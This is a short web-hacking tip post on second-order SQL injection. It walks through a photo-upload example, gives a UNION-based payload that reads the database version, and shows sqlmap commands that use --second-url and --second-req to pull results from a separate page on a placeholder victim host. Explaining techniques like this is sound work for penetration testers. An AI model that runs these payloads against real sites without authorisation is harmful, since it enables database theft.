Week 37 - Second Order SQLi
Last updated
Last updated
This week’s web hacking tip is on Second-Order SQL injections!
I’m sure most of you are plenty familiar with standard SQLi, but did you know that the payload result does not always render directly in the response? Let me explain..
Let’s say we have a web application that allows you to upload a photo and specify the photo name. When the photo is uploaded it displays on ‘view.php’ with all the other photos of the site, with the corresponding name under each photo. Let’s also assume the form upload is vulnerable to UNION-based SQLi in the photo name parameter.
Putting this all together, we can only exploit the SQL injection by issuing UNION-based payloads in the form upload request and then loading ‘view.php’ which displays all the photos. If all goes well, a payload like ‘+UNION+ALL+SELECT+1,2,@@version,4,5--+-’ will display something like ‘5.6.10’ as the name of the target photo on ‘view.php’.
Now how do we automate it? Luckily for us, SQLMap supports both --second-url and --second-req, which allow you to specify the second url/request file that actually loads the payload result. So we will issue the injection on 'upload.php', then load 'view.php' to get the result:
Get view.php as URL: sqlmap -r upload_request.txt -p photoName --second-url "http[:]//victim[.]com/view[.]php"
Get view.php as request file: sqlmap -r upload_request.txt -p photoName --second-req view_request.txt
Keep this in mind next time you’re dumping a DB!